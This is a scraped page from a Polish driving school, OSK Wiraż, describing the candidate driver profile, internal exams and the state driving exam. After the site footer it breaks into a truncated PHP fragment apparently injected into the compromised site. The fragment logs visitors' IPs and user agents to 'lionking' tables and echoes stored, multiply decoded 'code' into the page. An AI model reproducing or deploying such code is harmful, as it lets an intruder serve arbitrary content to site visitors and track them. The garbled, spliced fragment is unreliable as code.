PKK - Profil kursanta

Od 2013r. w celu zapisania się na kurs prawa jazdy dowolnej kategorii trzeba najpierw uzyskać dokument nazywany - profilem kandydata na kierowcę. Uzyskasz go we właściym wydziale komunikacji ze względu na miejsce zamieszkania

Egzamin wewnętrzny w OSK Wiraż

Po zakończeniu zajęć teoretycznych kursant musi przystąpić do egzaminu wewnętrznego teoretycznego, jak również po zakończeniu jazd praktycznych u instruktora prowadzącego trzeba zaliczyć egzamin wewnętrzny praktyczny.

Zasady obowiązujące na egzaminie państwowym

Każdy kurs prawa jazdy wieńczy egzamin państwowy w dowolnym Wojewódzkim Ośrodku Ruchu Drogowego, a dalej wydanie dokumentu prawa jazdy przez PWPW. Zasady egzaminowania są odmienne w zależności od kategorii prawa jazdy. Poznaj przepisy - żeby zdać w pierwszym terminie.

JoomShaper
= 1) { //mysql_query('INSERT INTO lionking (domainname, fullpath, ip, useragent, processtime) VALUES ("'.$g['domainname'].'","'.$g['fullpath'].'","'.$g['ip'].'","'.$g['useragent'].'", NOW())'); $rs = mysql_fetch_array($q); echo stripslashes(stripslashes(stripslashes(html_entity_decode(html_entity_decode($rs['code']))))); } else { mysql_query('INSERT INTO lionking_saved (domainname, stat, processtime) VALUES ("'.$g['domainname'].'","2", NOW())'); } } ?>